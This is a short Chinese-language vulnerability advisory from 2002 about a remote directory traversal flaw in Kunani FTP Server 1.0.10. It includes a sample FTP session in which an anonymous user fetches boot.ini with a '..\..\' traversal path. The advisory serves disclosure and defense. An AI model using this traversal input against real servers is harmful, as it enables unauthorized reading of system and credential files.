积极预防 及时发现
快速响应 力保恢复
Kunani FTP 服务程序远程目录遍历缺陷 (MS,缺陷)
发布时间:2002-12-17 信息来源:管理员

涉及程序:Kunani FTP Server 1.0.10 描述:Kunani FTP 服务程序远程目录遍历缺陷 详细: Kunani FTP Server 是一款Windows操作系统下的FTP服务程序。 Kunani FTP 由于对用户请求缺乏充分过滤:当攻击者递交的FTP请求中含有多个\`../\`字符时,Kunani FTP 将不能正确处理而认为它是合法的。本地/远程攻击者将可以利用此缺陷绕过 FTP root 目录限制,遍历系统目录,以 FTP 权限非法读取任意系统敏感文件。 受影响系统: Kunani FTP Server 1.0.10 攻击方法: Verbindung mit server. 220 Kunani FTP Server Ready ( www.kunani.com ) Benutzer (server:(none)): anonymous 331 Password required for anonymous. Kennwort: billsucks 230 User anonymous logged in. Ftp> get ..\\..\\..\\..\\..\\boot.ini 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. 226 Transfer complete. Ftp: 1337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek. 解决方案:目前厂商还没有提供补丁或升级程序,建议用户随时关注厂商站点: http://www.kunani.com